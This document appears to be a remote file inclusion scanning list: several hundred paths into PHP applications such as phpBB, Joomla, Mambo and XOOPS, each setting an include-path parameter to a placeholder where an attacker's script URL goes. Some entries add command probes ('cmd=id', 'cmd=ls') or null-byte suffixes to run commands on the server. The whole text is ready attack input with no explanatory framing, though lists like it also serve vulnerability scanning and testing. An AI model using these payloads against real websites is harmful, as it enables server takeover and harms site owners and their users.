/inc/header.inc.php?ficStyle=XXpathXX
/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
/inc/inc.php?cfg_racine=XXpathXX?
/inc/indexhead.php?fileloc=XXpathXX?
/inc/irayofuncs.php?irayodirhack=XXpathXX?
/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
/inc/linkbar.php?cfile=XXpathXX?
/inc/login.php?pathCGX=XXpathXX
/inc/logingecon.php?pathCGX=XXpathXX
/inc/ltdialogo.php?pathCGX=XXpathXX
/inc/mtdialogo.php?pathCGX=XXpathXX
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
/inc/prepend.inc.php?path=XXpathXX?
/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
/inc/settings.php?inc_dir=XXpathXX
/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
/inc/shows.inc.php?cutepath=XXpathXX?
/inc/sige_init.php?SYS_PATH=XXpathXX?
/inc_group.php?include_path=XXpathXX?
/inc_manager.php?include_path=XXpathXX?
/inc_newgroup.php.php?include_path=XXpathXX?
/inc_smb_conf.php?include_path=XXpathXX?
/inc_user.php?include_path=XXpathXX?
/include.php?_APP_RELATIVE_PATH=XXpathXX
/include.php?gorumDir=XXpathXX
/include.php?myng_root=XXpathXX
/include.php?path=psp/user.php&site=XXpathXX
/include.php?path[docroot]=XXpathXX
/include.php?sunPath=XXpathXX
/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX
/include/HTML_oben.php?include_path=XXpathXX?
/include/SQuery/gameSpy2.php?libpath=XXpathXX
/include/bbs.lib.inc.php?site_path=XXpathXX
/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
/include/classes.php?INCLUDE_DIR=XXpathXX?
/include/client.php?INCLUDE_DIR=XXpathXX?
/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
/include/common.php?XOOPS_ROOT_PATH=XXpathXX
/include/common_functions.php?baros_path=XXpathXX?
/include/config.inc.php?racine=XXpathXX
/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
/include/customize.php?l=XXpathXX&text=Hello%20World
/include/default_header.php?script_path=XXpathXX
/include/define.php?INC_DIR=XXpathXX?
/include/disp_form.php3?cfg_include_dir=XXpathXX?
/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
/include/dom.php?path=XXpathXX
/include/dtd.php?path=XXpathXX
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
/include/forms.php?INCLUDE_DIR=XXpathXX?
/include/global.php?pfad=XXpathXX
/include/header.php?cs_base_path=XXpathXX?
/include/html/nettools.popup.php?DIR=XXpathXX
/include/inc.foot.php?root=XXpathXX
/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
/include/inc_freigabe.php?include_path=XXpathXX?
/include/inc_freigabe1.php?include_path=XXpathXX?
/include/inc_freigabe3.php?include_path=XXpathXX?
/include/include_stream.inc.php?include_path=XXpathXX
/include/include_top.php?g_include=XXpathXX
/include/includes.php?include_path=XXpathXX
/include/index.php3?cfg_include_dir=XXpathXX?
/include/init.inc.php?G_PATH=XXpathXX
/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
/include/lib/lib_slots.php?main_path=XXpathXX
/include/lib/lib_stats.php?main_path=XXpathXX?
/include/lib/lib_users.php?main_path=XXpathXX?
/include/little_news.php3?cfg_include_dir=XXpathXX?
/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
/include/loading.php?path_include=XXpathXX
/include/mail.inc.php?root=XXpathXX
/include/menu_builder.php?config[page_dir]=XXpathXX?
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
/include/parser.php?path=XXpathXX
/include/pear/IT.php?basepath=XXpathXX?
/include/pear/ITX.php?basepath=XXpathXX?
/include/pear/IT_Error.php?basepath=XXpathXX?
/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
/include/prodler.class.php?sPath=XXpathXX???
/include/scripts/export_batch.inc.php?DIR=XXpathXX
/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
/include/scripts/send_email_cache.php?DIR=XXpathXX
/include/startup.inc.php?root_path=XXpathXX?
/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
/include/timesheet.php?config[include_dir]=XXpathXX
/include/urights.php?CRM_inc=XXpathXX
/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
/includes/ajax_listado.php?urlModulo=XXpathXX
/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
/includes/begin.inc.php?PagePrefix=XXpathXX
/includes/blogger.php?path_prefix=XXpathXX
/includes/class/class_tpl.php?cache_file=XXpathXX?
/includes/class_template.php?quezza_root_path=XXpathXX
/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
/includes/common.php?module_root_path=XXpathXX?
/includes/common.php?root=XXpathXX?
/includes/common.php?root_path=XXpathXX?
/includes/config.inc.php?racineTBS=XXpathXX
/includes/config/master.inc.php?fm_data[root]=XXpathXX?
/includes/connection.inc.php?PagePrefix=XXpathXX
/includes/dbal.php?eqdkp_root_path=XXpathXX
/includes/events.inc.php?PagePrefix=XXpathXX
/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
/includes/footer.inc.php?PagePrefix=XXpathXX
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
/includes/functions.inc.php?sitepath=XXpathXX?
/includes/functions.php?location=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX
/includes/functions.php?phpbb_root_path=XXpathXX?
/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/includes/functions/html_generate.php?path_prefix=XXpathXX
/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
/includes/functions/validations.php?path_prefix=XXpathXX
/includes/functions_admin.php?phpbb_root_path=XXpathXX?
/includes/functions_install.php?vwar_root=XXpathXX
/includes/functions_kb.php?phpbb_root_path=XXpathXX?
/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
/includes/functions_portal.php?phpbb_root_path=XXpathXX?
/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
/includes/global.php?nbs=XXpathXX?
/includes/header.inc.php?PagePrefix=XXpathXX
/includes/header.inc.php?dateiPfad=XXpathXX
/includes/include_once.php?include_file=XXpathXX
/includes/init.php?includepath=XXpathXX?
/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
/includes/kb_constants.php?module_root_path=XXpathXX
/includes/lang/language.php?path_to_root=XXpathXX
/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
/includes/logger_engine.php?phpbb_root_path=XXpathXX
/includes/menuleft.inc.php?PagePrefix=XXpathXX
/includes/mkb.php?phpbb_root_path=XXpathXX?ls
/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
/includes/mx_common.php?module_root_path=XXpathXX?
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
/includes/pafiledb_constants.php?module_root_path=XXpathXX
/includes/pages.inc.php?PagePrefix=XXpathXX
/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
/includes/profilcp_constants.php?module_root_path=XXpathXX?
/includes/settings.inc.php?approot=XXpathXX
/includes/template.php?myevent_path=XXpathXX
/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
/includes/tumbnail.php?config[root_ordner]=XXpathXX?
/includes/usercp_register.php?phpbb_root_path=XXpathXX?
/includes/usercp_viewprofile.php?phpbb_root_path=XXpathXX?
/includes/xhtml.php?d_root=XXpathXX?
/index.php3?Application_Root=XXpathXX
/index.php?1=lol&PAGES[lol]=XXpathXX
/index.php?AML_opensite=XXpathXX
/index.php?AMV_openconfig=1&AMV_serverpath=XXpathXX
/index.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/index.php?ConfigDir=XXpathXX
/index.php?DIR_PLUGINS=XXpathXX
/index.php?G_JGALL[inc_path]=XXpathXX%00
/index.php?HomeDir=XXpathXX
/index.php?Lang=AR&Page=XXpathXX
/index.php?Madoa=XXpathXX?
/index.php?RP_PATH=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=XXpathXX
/index.php?abg_path=XXpathXX?
/index.php?abs_path=XXpathXX?
/index.php?adduser=true&lang=XXpathXX
/index.php?adodb=XXpathXX
/index.php?ads_file=XXpathXX
/index.php?arquivo=XXpathXX
/index.php?back=XXpathXX
/index.php?base==XXpathXX
/index.php?basePath=XXpathXX
/index.php?bibtexrootrel=XXpathXX?
/index.php?blog_dc_path=XXpathXX
/index.php?blog_theme=XXpathXX
/index.php?body=XXpathXX
/index.php?class_path=XXpathXX?
/index.php?classified_path=XXpathXX?
/index.php?cms=XXpathXX?
/index.php?config["sipssys"]=XXpathXX
/index.php?config[root_ordner]=XXpathXX?&cmd=id
/index.php?config[root_ordner]=XXpathXX?cmd=id
/index.php?config_atkroot=XXpathXX
/index.php?configuration=XXpathXX
/index.php?custom_admin_path=XXpathXX?
/index.php?dateiPfad=XXpathXX?&cmd=ls
/index.php?de=XXpathXX
/index.php?dept=XXpathXX
/index.php?do=XXpathXX
/index.php?exec=XXpathXX?
/index.php?ext=XXpathXX
/index.php?faq_path=XXpathXX?&cmd=id
/index.php?file_name[]=XXpathXX?
/index.php?file_path=XXpathXX?
/index.php?fileloc=XXpathXX
/index.php?from=XXpathXX
/index.php?func=XXpathXX?
/index.php?function=XXpathXX
/index.php?function=custom&custom=XXpathXX
/index.php?gOo=XXpathXX
/index.php?gen=XXpathXX
/index.php?get=XXpathXX
/index.php?home_name=XXpathXX
/index.php?ilang=XXpathXX?
/index.php?inc_dir=XXpathXX
/index.php?inc_dir=XXpathXX?
/index.php?includeDir=XXpathXX
/index.php?includeFooter=XXpathXX
/index.php?includesdir=XXpathXX
/index.php?insPath=XXpathXX
/index.php?lang=XXpathXX
/index.php?language=XXpathXX?
/index.php?language=en&main_page=XXpathXX
/index.php?lizge=XXpathXX?&cmd=ls
/index.php?lng=XXpathXX
/index.php?load=XXpathXX
/index.php?loadpage=XXpathXX
/index.php?main_tabid=1&main_content=XXpathXX
/index.php?may=XXpathXX
/index.php?middle=XXpathXX
/index.php?mode=XXpathXX
/index.php?modpath=XXpathXX
/index.php?module=PostWrap&page=XXpathXX
/index.php?mosConfig_absolute_path=XXpathXX
/index.php?news7["functions"]=XXpathXX
/index.php?news_include_path=XXpathXX
/index.php?open=XXpathXX
/index.php?option=com_custompages&cpage=XXpathXX?
/index.php?page=XXpathXX
/index.php?page=XXpathXX%00
/index.php?page=XXpathXX?
/index.php?pageXXpathXX
/index.php?page[path]=XXpathXX?&cmd=ls
/index.php?pagename=XXpathXX
/index.php?pager=XXpathXX
/index.php?pagina=XXpathXX?
/index.php?path_to_folder=XXpathXX?cmd=id
/index.php?pg=XXpathXX?
/index.php?phpbb_root_path=XXpathXX
/index.php?plugin=XXpathXX
/index.php?principal=XXpathXX
/index.php?proMod=XXpathXX
/index.php?proMod=XXpathXX?cmd
/index.php?project=XXpathXX
/index.php?repinc=XXpathXX?
/index.php?root_prefix=XXpathXX
/index.php?root_prefix=XXpathXX?
/index.php?section=XXpathXX
/index.php?site=XXpathXX
/index.php?site_path=XXpathXX
/index.php?styl[top]=XXpathXX??
/index.php?template=XXpathXX?
/index.php?templates_dir=XXpathXX?
/index.php?theme=XXpathXX
/index.php?themepath=XXpathXX?
/index.php?themesdir=XXpathXX
/index.php?this_path=XXpathXX?
/index.php?txt=XXpathXX
/index.php?up=XXpathXX
/index.php?url=XXpathXX
/index.php?w=XXpathXX
/index.php?way=XXpathXX??????????????
/index1.php?=XXpathXX
/index1.php?inc=XXpathXX
/index1.php?inhalt=XXpathXX
/index2.php?=XXpathXX
/index2.php?content=XXpathXX
/index2.php?s=XXpathXX
/index2.php?x=XXpathXX
/indexinfo.php?bibtexrootrel=XXpathXX?
/indexk.php?lib_path=XXpathXX?
/info.php?file=XXpathXX
/inhalt.php?dateien[news]=XXpathXX?
/init.php?API_HOME_DIR=XXpathXX
/init.php?scriptpath=XXpathXX?
/initialize.php?hmail_config[includepath]=XXpathXX&cmd=dir
/initiate.php?abs_path=XXpathXX
/install.php?_NE[AbsPath]=XXpathXX
/install.php?install_dir=XXpathXX
/install/config.php?path=XXpathXX
/install/di.php?pathtoserverdata=XXpathXX
/install/index.php?content_php=XXpathXX
/install/install3.php?database=none&cabsolute_path=XXpathXX
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=XXpathXX?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=XXpathXX?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=XXpathXX?
/interface/billing/billing_process.php?srcdir=XXpathXX?
/interface/editors/-custom.php?bField[bf_data]=XXpathXX
/interface/editors/custom.php?bField[bf_data]=XXpathXX
/interface/new/new_patient_save.php?srcdir=XXpathXX?
/intern/admin/?rootdir=XXpathXX
/intern/admin/other/backup.php?admin=1&rootdir=XXpathXX
/intern/clan/member_add.php?rootdir=XXpathXX
/intern/config/forum.php?rootdir=XXpathXX
/intern/config/key_2.php?rootdir=XXpathXX
/ip.inc.php?type=1&cgipath=XXpathXX
/ipeer_site/?page=XXpathXX?
/joinus.php?vwar_root=XXpathXX
/joinus.php?vwar_root=XXpathXX?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=XXpathXX?
/joomla_path/components/com_articles.php?absolute_path=XXpathXX?
/js/bbcodepress/bbcode-form.php?BBCODE_path=XXpathXX
/js/wptable-tinymce.php?ABSPATH=XXpathXX
/jscript.php?my_ms[root]=XXpathXX?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=XXpathXX
/kernel/loadkernel.php?installPath=XXpathXX
/kmitaadmin/kmitam/htmlcode.php?file=XXpathXX?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=XXpathXX
/lang/leslangues.php?fichier=XXpathXX
/lang_english/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_english/lang_activity.php?phpbb_root_path=XXpathXX
/language/lang_english/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=XXpathXX?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=XXpathXX?a=
/latestposts.php?forumspath=XXpathXX
/latex.php?bibtexrootrel=XXpathXX?
/layout/default/params.php?gConf[dir][layouts]=XXpathXX?
/ldap/authldap.php?includePath=XXpathXX
/learnPath/include/scormExport.inc.php?includePath=XXpathXX
/lib.editor.inc.php?sys_path=XXpathXX?
/lib/Loggix/Module/Calendar.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Comment.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Rss.php?pathToIndex=XXpathXX
/lib/Loggix/Module/Trackback.php?pathToIndex=XXpathXX
/lib/action/rss.php?lib=XXpathXX?
/lib/activeutil.php?set[include_path]=XXpathXX?
/lib/addressbook.php?GLOBALS[basedir]=XXpathXX
/lib/armygame.php?libpath=XXpathXX
/lib/authuser.php?root=XXpathXX
/lib/base.php?BaseCfg[BaseDir]=XXpathXX
/lib/connect.php?root=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX
/lib/connected_users.lib.php3?ChatPath=XXpathXX?
/lib/db/mysql.class.php?root=XXpathXX
/lib/db/postgres.class.php?root=XXpathXX
/lib/functions.php?DOC_ROOT=XXpathXX
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=XXpathXX?
/lib/header.php?DOC_ROOT=XXpathXX
/lib/language.php?_LIB_DIR=XXpathXX
/lib/live_status.lib.php?ROOT=XXpathXX
/lib/misc.php?root=XXpathXX
/lib/nl/nl.php?g_strRootDir=XXpathXX
/lib/obj/collection.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=XXpathXX
/lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/pcltrace.lib.php?g_pcltar_lib_dir=XXpathXX
/lib/rs.php?rootpath=XXpathXX
/lib/selectlang.php?BBC_LANGUAGE_PATH=XXpathXX
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=XXpathXX?
/lib/static/header.php?set_menu=XXpathXX
/lib/tpl.inc.php?conf[classpath]=XXpathXX
/libraries/comment/postComment.php?path[cb]=XXpathXX?a=
/libraries/database.php?path=XXpathXX???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=XXpathXX
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=XXpathXX
/library/authorize.php?login_form=XXpathXX?
/library/translation.inc.php?GLOBALS[srcdir]=XXpathXX?
/libs/db.php?path_local=XXpathXX
/libs/ftp.php?path_local=XXpathXX
/libs/lom.php?ETCDIR=XXpathXX
/libsecure.php?abs_path=XXpathXX?
/license.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/link_main.php?phpbb_root_path=XXpathXX
/linkadmin.php?page=XXpathXX?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=XXpathXX?
/list.php?phpbb_root_path=XXpathXX
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=XXpathXX
/lms_path/modules/welcome.php?_LIB_DIR=XXpathXX
/load_lang.php?_SERWEB[configdir]=XXpathXX
/load_lang.php?_SERWEB[serwebdir]=XXpathXX
/load_phplib.php?_PHPLIB[libdir]=XXpathXX
/loader.php?GLOBALS=XXpathXX
/local/lib/lcUser.php?LIBDIR=XXpathXX?
/log.php?bibtexrootrel=XXpathXX?
/login.php3?cl_headers=XXpathXX
/login.php?base_dir=XXpathXX
/login.php?blog_theme=XXpathXX
/login.php?langfile=XXpathXX
/login.php?pachtofile=XXpathXX
/login.php?srcdir=XXpathXX?
/login.php?value=XXpathXX??
/lovecms/install/index.php?step=XXpathXX?
/m2f/m2f_cron.php?m2f_root_path=XXpathXX
/m2f/m2f_forum.php?m2f_root_path=XXpathXX
/m2f/m2f_mailinglist.php?m2f_root_path=XXpathXX
/m2f/m2f_phpbb204.php?m2f_root_path=XXpathXX
/maguz.php?site=XXpathXX
/mail/childwindow.inc.php?form=XXpathXX?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=XXpathXX?
/mail_this_entry/mail_autocheck.php?pm_path=XXpathXX?&cmd=ls
/main.inc.php?pathtoscript=XXpathXX
/main.php?config[search_disp]=true&include_dir=XXpathXX
/main.php?id=XXpathXX
/main.php?include_path=XXpathXX?
/main.php?pageURL=XXpathXX
/main.php?pagina=XXpathXX
/main/forum/komentar.php?site_path=XXpathXX
/main/main.php?pi=XXpathXX
/main/ppcbannerclick.php?INC=XXpathXX?
/main/ppcclick.php?INC=XXpathXX?
/main_prepend.php?_SERWEB[functionsdir]=XXpathXX
/mainpage.php?docroot=XXpathXX?cmd
/mamboleto.php?mosConfig_absolute_path=XXpathXX
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=XXpathXX
/manage_songs.php?foing_root_path=XXpathXX
/manager/admin/index.php?MGR=XXpathXX
/manager/admin/p_ins.php?MGR=XXpathXX
/manager/admin/u_ins.php?MGR=XXpathXX
/manager/articles.php?_PX_config[manager_path]=XXpathXX
/manager/static/view.php?propID=0&INC=XXpathXX
/master.php?root_path=XXpathXX
/mcNews/admin/header.php?skinfile=XXpathXX
/mcf.php?content=XXpathXX
/mcnews/admin/install.php?l=XXpathXX
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=XXpathXX
/member.php?vwar_root=XXpathXX
/member/usercp_menu.php?script_folder=XXpathXX
/members/index.php?INC=XXpathXX?
/members/registration.php?INC=XXpathXX?
/members_help.php?hlp=XXpathXX?
/membres/membreManager.php?include_path=XXpathXX?
/menu.php3?cl_headers=XXpathXX
/menu.php?functions_file=XXpathXX
/mep/frame.php?chem=XXpathXX?
/microcms/includes/file_manager/special.php?fm_includes_special=XXpathXX
/middle.php?file=XXpathXX
/migrateNE2toNE3.php?_NE[AbsPath]=XXpathXX
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=XXpathXX?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=XXpathXX?
/mini-pub.php/front-end/img.php?sFileName=XXpathXX?
/minimal/wiki.php?page=XXpathXX?
/misc/function.php3?path=XXpathXX?
/mitglieder.php?config[root_ordner]=XXpathXX?&cmd=id
/mkportal/include/user.php?MK_PATH=XXpathXX
/mkportal/include/user.php?MK_PATH=XXpathXX?
/mod/authent.php4?rootpath=XXpathXX
/mod/image/index.php?config[pathMod]=XXpathXX
/mod/liens/index.php?config[pathMod]=XXpathXX
/mod/liste/index.php?config[pathMod]=XXpathXX
/mod/special/index.php?config[pathMod]=XXpathXX
/mod/texte/index.php?config[pathMod]=XXpathXX
/mod_membre/inscription.php?chemin=XXpathXX?
/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
/modernbill/include/html/config.php?DIR=XXpathXX
/modifyform.html?code=XXpathXX
/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
/mods/config/load.inc.php?moddir=XXpathXX?
/mods/http/load.inc.php?moddir=XXpathXX?
/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
/module/forum/forum.php?fd=XXpathXX=';
/module/forum/main.php?id=1&main_dir=XXpathXX?&
/modules.php?name=XXpathXX&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
/modules/Calendar/admin/update.php?calpath=XXpathXX?
/modules/Calendar/calendar.php?calpath=XXpathXX?
/modules/Calendar/scheme.php?calpath=XXpathXX?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/My_eGallery/index.php?basepath=XXpathXX
/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
/modules/NukeAI/util.php?AIbasedir=XXpathXX
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/abook/foldertree.php?baseDir==XXpathXX?
/modules/addons/plugin.php?doc_root=XXpathXX
/modules/admin/include/config.php?doc_root=XXpathXX
/modules/admin/include/localize.php?doc_root=XXpathXX
/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
/modules/birstday/select.php?exbb[home_path]=XXpathXX?
/modules/blocks/headerfile.php?system[path]=XXpathXX
/modules/calendar/index.php?inc_dir=XXpathXX
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
/modules/certinfo/index.php?full_path=XXpathXX
/modules/character_roster/include.php?mod_root=XXpathXX?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/modules/emails/index.php?full_path=XXpathXX
/modules/events/index.php?full_path=XXpathXX
/modules/fax/index.php?full_path=XXpathXX
/modules/files/blocks/latest_files.php?system[path]=XXpathXX
/modules/files/index.php?full_path=XXpathXX
/modules/files/list.php?full_path=XXpathXX
/modules/filters/headerfile.php?system[path]=XXpathXX
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
/modules/groupadm/index.php?full_path=XXpathXX
/modules/groups/headerfile.php?system[path]=XXpathXX
/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
/modules/history/index.php?full_path=XXpathXX
/modules/home.module.php?repmod=XXpathXX?
/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
/modules/info/index.php?full_path=XXpathXX
/modules/links/blocks/links.php?system[path]=XXpathXX
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
/modules/log/index.php?full_path=XXpathXX
/modules/mail/index.php?full_path=XXpathXX
/modules/menu/headerfile.php?system[path]=XXpathXX
/modules/messages/index.php?full_path=XXpathXX
/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_calendar.php?absolute_path=XXpathXX
/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_weather.php?absolute_path=XXpathXX?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
/modules/news/blocks/latest_news.php?system[path]=XXpathXX
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
/modules/organizations/index.php?full_path=XXpathXX
/modules/phones/index.php?full_path=XXpathXX
/modules/pms/index.php?module_path=XXpathXX???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
/modules/presence/index.php?full_path=XXpathXX
/modules/projects/index.php?full_path=XXpathXX
/modules/projects/list.php?full_path=XXpathXX
/modules/projects/summary.inc.php?full_path=XXpathXX
/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
/modules/punish/profile.php?exbb[home_path]=XXpathXX?
/modules/reports/index.php?full_path=XXpathXX
/modules/search/index.php?full_path=XXpathXX
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
/modules/settings/headerfile.php?system[path]=XXpathXX
/modules/snf/index.php?full_path=XXpathXX
/modules/syslog/index.php?full_path=XXpathXX
/modules/tasks/index.php?full_path=XXpathXX
/modules/tasks/searchsimilar.php?full_path=XXpathXX
/modules/tasks/summary.inc.php?full_path=XXpathXX
/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
/modules/useradm/index.php?full_path=XXpathXX
/modules/users/headerfile.php?system[path]=XXpathXX
/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xfsection/modify.php?dir_module=XXpathXX
